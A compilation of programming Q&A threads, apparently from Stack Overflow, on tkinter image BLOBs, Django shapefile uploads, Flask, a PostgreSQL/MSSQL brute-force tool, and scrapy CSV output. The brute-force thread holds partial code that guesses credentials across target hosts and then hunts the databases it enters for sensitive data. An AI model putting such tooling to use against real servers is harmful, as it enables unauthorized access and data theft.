I have a CRUD form with entries and 4 button for deleting, updating, creating, getting values from my database, I want to implement another button to open an imagen which is binded to my id entry also able to works with my deleting, updating, creating, getting buttons, I've been trying to use BLOB and I'm able to save an image in my database as BLOB. Actually I understand that I need to create textvariables for my entries like 'idvar = StringVar() , namevar = Stringvar()..., etc', So I'm not sure how to do it for an image label in order to work with my CRUD buttons deleting, updating, creating, getting
This is my code I got so far and it's working well saving images into my photos columns:
from tkinter import *
import sqlite3
top = Tk()
top.configure(width='444', heigh='400')
conn = sqlite3.connect('test.db')
c = conn.cursor()
def enterdata():
id = 'hello'
photo = convert_pic()
c.execute('INSERT INTO test (id, photo) VALUES (?, ?)', (id, photo)) #Here my id has integer value and my photo has BLOB value in my database
conn.commit()
def convert_pic():
filename = 'images/image6.jpg'
with open(filename, 'rb') as file:
photo = file.read()
return photo
btn = Button(top, text='save photo', command=enterdata)
btn.place(x='100', y='111')
mainloop()
Now that you have the BLOB you can use io.BytesIO. I will create an example to demonstrate, like:
from PIL import Image, ImageTk
from io import BytesIO
def show(data):
img_byte = BytesIO(data)
img = ImageTk.PhotoImage(Image.open(img_byte))
Label(root,image=img).pack()
root.image = img # Keep a reference
So now you can query the database and fetch the value:
def fetch():
c = con.cursor()
id = 1 # Any id
c.execute('SELECT photo FROM test where id=?',(id,))
data = c.fetchall()[0][0] # Get the blob data
show(data) # Call the function with the passes data
This will show the image in a label in the root window for the entered id.
So, the goal is to create a webpage to load a .shp file into and get a summary of some calculations as a JsonResponse. I have prepared the calculations and everything and it works nicely when I add a manual path to the file in question. However, the goal is for someone else to be able to upload the data and get back the response so I can't hardcode my path.
The overall approach:
Read in a through forms.FileField() and request.FILES['file_name']. After this, I need to transfer this request.FILES object to DataSource in order to read it in. I would rather not upload the file on pc if possible but work directly from the memory.
forms.py
from django import forms
from django.core.files.storage import FileSystemStorage
class UploadFileForm(forms.Form):
# title = forms.CharField(max_length=50)
file = forms.FileField()
views.py
import json
import os
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.template import loader
from django.contrib import messages
from django.views.generic import TemplateView
from django.http import JsonResponse
from django.conf import settings
from .forms import UploadFileForm
from . import models
from django.shortcuts import redirect
from gisapp.functions.functions import handle_uploaded_file, handle_uploaded_file_two
from django.contrib.gis.gdal import DataSource
from django.core.files.uploadedfile import UploadedFile, TemporaryUploadedFile
import geopandas as gpd
import fiona
def upload_file(request):
if request.method == 'POST':
form = UploadFileForm(request.POST, request.FILES)
if form.is_valid():
f = request.FILES['file']
# geo2 = gpd.read_file(f)
# print(geo2)
# f_path = os.path.abspath(os.path.join(os.path.dirname(f), f))
# f_path = TemporaryUploadedFile.temporary_file_path(UploadedFile(f))
# print(f_path)
# f_path = f.temporary_file_path()
# new_path = request.FILES['file'].temporary_file_path
# print(f'This is file path: {f_path}')
# print(f'This is file path: {new_path}')
# data = DataSource(f'gisapp/data/{f}') -- given an absolute path it works great
data = DataSource(f) -- constantly failing
# data = DataSource(new_path)
# print(f'This is file path: {f_path}')
layer = data[0]
if layer.geom_type.name == "Polygon" or layer.geom_type.name == "LineString":
handle_uploaded_file(request.FILES['file'])
elif layer.geom_type.name == "Point":
handle_uploaded_file_two(request.FILES['file'])
return JsonResponse({"Count": f"{handle_uploaded_file_two(request.FILES['file'])[0]}", "Bounding Box": f"{handle_uploaded_file_two(request.FILES['file'])[1]}"})
# return JsonResponse({"Count": f"{handle_uploaded_file(request.FILES['file'])[0]}", "Minimum": f"{handle_uploaded_file(request.FILES['file'])[1]}", "Maximum": f"{handle_uploaded_file(request.FILES['file'])[1]}"})
# instance = models.GeometryUpload(file_field=request.FILES['file'])
# instance.save()
# # return HttpResponseRedirect('/success/')
else:
form = UploadFileForm()
return render(request, 'upload.html', {'form': form})
Error I get:
django.contrib.gis.gdal.error.GDALException: Invalid data source input type: <class 'django.core.files.uploadedfile.InMemoryUploadedFile'>
Now as you can see from the upload_file() in views.py, I tried a multitude of operations and when I add an absolute path, it works, but besides that I can't seem to upload the file to DataSource so that I can use it in my later analysis.
Looking at how Django handles this, it doesn't appear possible to work off of an in memory file. The path to the file is passed to the C API for OGR which then handles opening the file and reading it in.
A possible solution that I am trying myself is to have the user zip their shape files (.shp,.shx.,dbf etc.) beforehand. The zip file is then uploaded and unzipped. The shp files can then be read. Hope this helps
I face the same problem and my workaround was to save the file upload by the user in a temporary folder, then pass the absolute path of the temporary file to my DataSource. After finish all my process with the temporary file, I deleted.
The downside of this method is the execution time, is slow.
I am trying to make this web app to work but I am getting an error. these are the steps that web app is supposed to handle:
import a file
run the python script
export the results
when I run python script independently( without interfering with flask), it works fine( I use Jupyter notebook) on the other hand, when I run it with flask (from prompt) I get an error:
File "app.py", line 88, in <module>
for name, df in transformed_dict.items():
NameError: name 'transformed_dict' is not defined
Any idea of how can I make this web app to work?
This is my first time using flask and I will appreciate any suggestions or guidance.
python file & html file
from flask import Flask,render_template,request,send_file
from flask_sqlalchemy import SQLAlchemy
import os
import pandas as pd
from openpyxl import load_workbook
import sqlalchemy as db
def transform(df):
# Some data processing here
return df
app=Flask(__name__)
#app.route('/')
def index():
return render_template('firstpage.html')
#app.route('/upload',methods=['Get','POST'])
def upload():
file=request.files['inputfile']
xls=pd.ExcelFile(file)
name_dict = {}
snames = xls.sheet_names
for sn in snames:
name_dict[sn] = xls.parse(sn)
for key, value in name_dict.items():
transform(value)
transformed_dict={}
for key, value in name_dict.items():
transformed_dict[key]=transform(value)
#### wirte to excel example:
writer = pd.ExcelWriter("MyData.xlsx", engine='xlsxwriter')
for name, df in transformed_dict.items():
df.to_excel(writer, sheet_name=name)
writer.save()
if __name__=='__main__':
app.run(port=5000)
Your block:
#### wirte to excel example:
writer = pd.ExcelWriter("MyData.xlsx", engine='xlsxwriter')
for name, df in transformed_dict.items():
df.to_excel(writer, sheet_name=name)
writer.save()
should be part of your upload() function since that's where you define and fill transformed_dict. You just need to match the indentation there to the block above it.
The current error is coming up because it's trying to run that code as soon as you start your script, and transformed_dict doesn't exist at that point.
I am creating a dictionary attacking tool on PostgreSQL. The tool is inspired by the work of m8r0wn - enumdb tool. Mikes tool is aimed at MySQL and MSSQL. I aim to use the same approach he used but modify the actions and output file. The script should
1) Read a CSV file that contains targets and ports, one per line 127.0.0.1,3380.
2) when provided a list of usernames and/or passwords, it will cycle through each targeted host looking for valid credentials. By default, it will use newly discovered credentials to search for sensitive information in the host's databases via keyword searches on the table or column names.
3) This information can then be extracted and reported to a JSON, .csv or .xlsx output file.
I have a semi functional code, but I suspect the PostgreSQL connection function is not working due to the logic behind passing parameters. I am interested in suggestions on how best I could present the tools results as a JSON file.
I understand that in Python, we have several modules available to connect and work with PostgreSQL which include:
Psycopg2
pg8000
py-postgresql
PyGreSQL
ocpgdb
bpgsql
SQLAlchemy
see also https://www.a2hosting.co.za/kb/developer-corner/postgresql/connecting-to-postgresql-using-python
The connection methods I have tried include:
import psycopg2
from psycopg2 import Error
conn = psycopg2.connect(host=host, dbname=db_name, user=_user, password=_pass, port=port)
import pg
conn = pg.DB(host=args.hostname, user= _user, passwd= _pass)
sudo pip install pgdb
import pgdb
conn = pgdb.connect(host=args.hostname, user= _user, passwd= _pass)
I am not sure how to pass the different _user and _pass guesses into the pyscopg2 for instance, without breaking the code.
I have imported the following libraries
import re
import psycopg2
from psycopg2 import Error
import pgdb
#import MySQLdb
import pymssql
import argparse
from time import sleep
from sys import exit, argv
from getpass import getpass
from os import path, remove
from openpyxl import Workbook
from threading import Thread, activeCount
The PgSQL block is as follows:
##########################################
# PgSQL DB Class
##########################################
class pgsql():
def connect(self, host, port, user, passwd, verbose):
try:
con = pgdb.connect(host=host, port=port, user=user, password=passwd, connect_timeout=3)
con.query_timeout = 15
print_success("[*] Connection established {}:{}#{}".format(user,passwd,host))
return con
except Exception as e:
if verbose:
print_failure("[!] Login failed {}:{}#{}\t({})".format(user,passwd,host,e))
else:
print_failure("[!] Login failed {}:{}#{}".format(user, passwd, host))
return False
def db_query(self, con, cmd):
try:
cur = con.cursor()
cur.execute(cmd)
data = cur.fetchall()
cur.close()
except:
data = ''
return data
def get_databases(self, con):
databases = []
for x in self.db_query(con, 'SHOW DATABASES;'):
databases.append(x[0])
return databases
def get_tables(self, con, database):
tables = []
self.db_query(con, "USE {}".format(database))
for x in self.db_query(con, 'SHOW TABLES;'):
tables.append(x[0])
return tables
def get_columns(self, con, database, table):
# database var not used but kept to support mssql
columns = []
for x in self.db_query(con, 'SHOW COLUMNS FROM {}'.format(table)):
columns.append(x[0])
return columns
def get_data(self, con, database, table):
# database var not used but kept to support mssql
return self.db_query(con, 'SELECT * FROM {} LIMIT {}'.format(table, SELECT_LIMIT))
The MSSQL is as follows:
# MSSQL DB Class
class mssql():
def connect(self, host, port, user, passwd, verbose):
try:
con = pymssql.connect(server=host, port=port, user=user, password=passwd, login_timeout=3, timeout=15)
print_success("[*] Connection established {}:{}#{}".format(user,passwd,host))
return con
except Exception as e:
if verbose:
print_failure("[!] Login failed {}:{}#{}\t({})".format(user,passwd,host,e))
else:
print_failure("[!] Login failed {}:{}#{}".format(user, passwd, host))
return False
def db_query(self, con, cmd):
try:
cur = con.cursor()
cur.execute(cmd)
data = cur.fetchall()
cur.close()
except:
data = ''
return data
def get_databases(self, con):
databases = []
for x in self.db_query(con, 'SELECT NAME FROM sys.Databases;'):
databases.append(x[0])
return databases
def get_tables(self, con, database):
tables = []
for x in self.db_query(con, 'SELECT NAME FROM {}.sys.tables;'.format(database)):
tables.append(x[0])
return tables
def get_columns(self, con, database, table):
columns = []
for x in self.db_query(con, 'USE {};SELECT column_name FROM information_schema.columns WHERE table_name = \'{}\';'.format(database, table)):
columns.append(x[0])
return columns
def get_data(self, con, database, table):
return self.db_query(con, 'SELECT TOP({}) * FROM {}.dbo.{};'.format(SELECT_LIMIT, database, table))
The main function block:
def main(args):
try:
for t in args.target:
x = Thread(target=enum_db().db_main, args=(args, t,))
x.daemon = True
x.start()
# Do not exceed max threads
while activeCount() > args.max_threads:
sleep(0.001)
# Exit all threads before closing
while activeCount() > 1:
sleep(0.001)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
exit(0)
if __name__ == '__main__':
version = '1.0.7'
try:
args = argparse.ArgumentParser(description=("""
{0} (v{1})
--------------------------------------------------
Brute force Juggernaut is a PgSQL brute forcing tool.**""").format(argv[0], version), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)
user = args.add_mutually_exclusive_group(required=True)
user.add_argument('-u', dest='users', type=str, action='append', help='Single username')
user.add_argument('-U', dest='users', default=False, type=lambda x: file_exists(args, x), help='Users.txt file')
passwd = args.add_mutually_exclusive_group()
passwd.add_argument('-p', dest='passwords', action='append', default=[], help='Single password')
passwd.add_argument('-P', dest='passwords', default=False, type=lambda x: file_exists(args, x), help='Password.txt file')
args.add_argument('-threads', dest='max_threads', type=int, default=3, help='Max threads (Default: 3)')
args.add_argument('-port', dest='port', type=int, default=0, help='Specify non-standard port')
args.add_argument('-r', '-report', dest='report', type=str, default=False, help='Output Report: csv, xlsx (Default: None)')
args.add_argument('-t', dest='dbtype', type=str, required=True, help='Database types currently supported: mssql, pgsql')
args.add_argument('-c', '-columns', dest="column_search", action='store_true', help="Search for key words in column names (Default: table names)")
args.add_argument('-v', dest="verbose", action='store_true', help="Show failed login notices & keyword matches with Empty data sets")
args.add_argument('-brute', dest="brute", action='store_true', help='Brute force only, do not enumerate')
args.add_argument(dest='target', nargs='+', help='Target database server(s)')
args = args.parse_args()
# Put target input into an array
args.target = list_targets(args.target[0])
# Get Password if not provided
if not args.passwords:
args.passwords = [getpass("Enter password, or continue with null-value: ")]
# Define default port based on dbtype
if args.port == 0: args.port = default_port(args.dbtype)
# Launch Main
print("\nStarting enumdb v{}\n".format(version) + "-" * 25)
main(args)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
exit(0)
I am aware that documentation states here http://initd.org/psycopg/docs/module.html states about how connection parameters can be specified. I would like to pass password guesses into the brute class and recursively try different combinations.
PEP-8 asks that you please give classes a name
starting with a capital letter, e.g. Pgsql.
You mentioned that the pgsql connect() method is not working properly,
but didn't offer any diagnostics such as a stack trace.
You seem to be working too hard, given that the sqlalchemy layer
has already addressed the DB porting issue quite nicely.
Just assemble a connect string starting with
the name of the appropriate DB package,
and let sqlalchemy take care of the rest.
All your methods accept con as an argument.
You really want to factor that out as the object attribute self.con.
The db_query() method apparently assumes that
arguments for WHERE clauses already appear, properly quoted, in cmd.
According to Little Bobby's mother,
it makes sense to accept query args according to the API,
rather than worrying about potential for SQL injection.
I've written a very tiny script in python scrapy to parse name, street and phone number displayed across multiple pages from yellowpage website. When I run my script i find it working smoothly. However, the only problem i encounter is the way data are getting scraped in csv output. It is always a line (row) gap between two rows. What I meant is: data are getting printed in every other row. Seeing the picture below you will get to know what I meant. If it were not for scrapy, I could have used [newline='']. But, unfortunately I am totally helpless here. How can i get rid of blank lines coming along in the csv output? Thanks in advance to take a look into it.
items.py includes:
import scrapy
class YellowpageItem(scrapy.Item):
name = scrapy.Field()
street = scrapy.Field()
phone = scrapy.Field()
Here is the spider:
import scrapy
class YellowpageSpider(scrapy.Spider):
name = "YellowpageSp"
start_urls = ["https://www.yellowpages.com/search?search_terms=Pizza&geo_location_terms=Los%20Angeles%2C%20CA&page={0}".format(page) for page in range(2,6)]
def parse(self, response):
for titles in response.css('div.info'):
name = titles.css('a.business-name span[itemprop=name]::text').extract_first()
street = titles.css('span.street-address::text').extract_first()
phone = titles.css('div[itemprop=telephone]::text').extract_first()
yield {'name': name, 'street': street, 'phone':phone}
Here is how the csv output looks like:
Btw, the command I'm using to get csv output is:
scrapy crawl YellowpageSp -o items.csv -t csv
You can fix it by creating a new FeedExporter. Change your settings.py as below
FEED_EXPORTERS = {
'csv': 'project.exporters.FixLineCsvItemExporter',
}
create a exporters.py in your project
exporters.py
import io
import os
import six
import csv
from scrapy.contrib.exporter import CsvItemExporter
from scrapy.extensions.feedexport import IFeedStorage
from w3lib.url import file_uri_to_path
from zope.interface import implementer
#implementer(IFeedStorage)
class FixedFileFeedStorage(object):
def __init__(self, uri):
self.path = file_uri_to_path(uri)
def open(self, spider):
dirname = os.path.dirname(self.path)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
return open(self.path, 'ab')
def store(self, file):
file.close()
class FixLineCsvItemExporter(CsvItemExporter):
def __init__(self, file, include_headers_line=True, join_multivalued=',', **kwargs):
super(FixLineCsvItemExporter, self).__init__(file, include_headers_line, join_multivalued, **kwargs)
self._configure(kwargs, dont_fail=True)
self.stream.close()
storage = FixedFileFeedStorage(file.name)
file = storage.open(file.name)
self.stream = io.TextIOWrapper(
file,
line_buffering=False,
write_through=True,
encoding=self.encoding,
newline="",
) if six.PY3 else file
self.csv_writer = csv.writer(self.stream, **kwargs)
I am on Mac, so can't test its windows behavior. But if above doesn't work then change below part of code and set newline="\n"
self.stream = io.TextIOWrapper(
file,
line_buffering=False,
write_through=True,
encoding=self.encoding,
newline="\n",
) if six.PY3 else file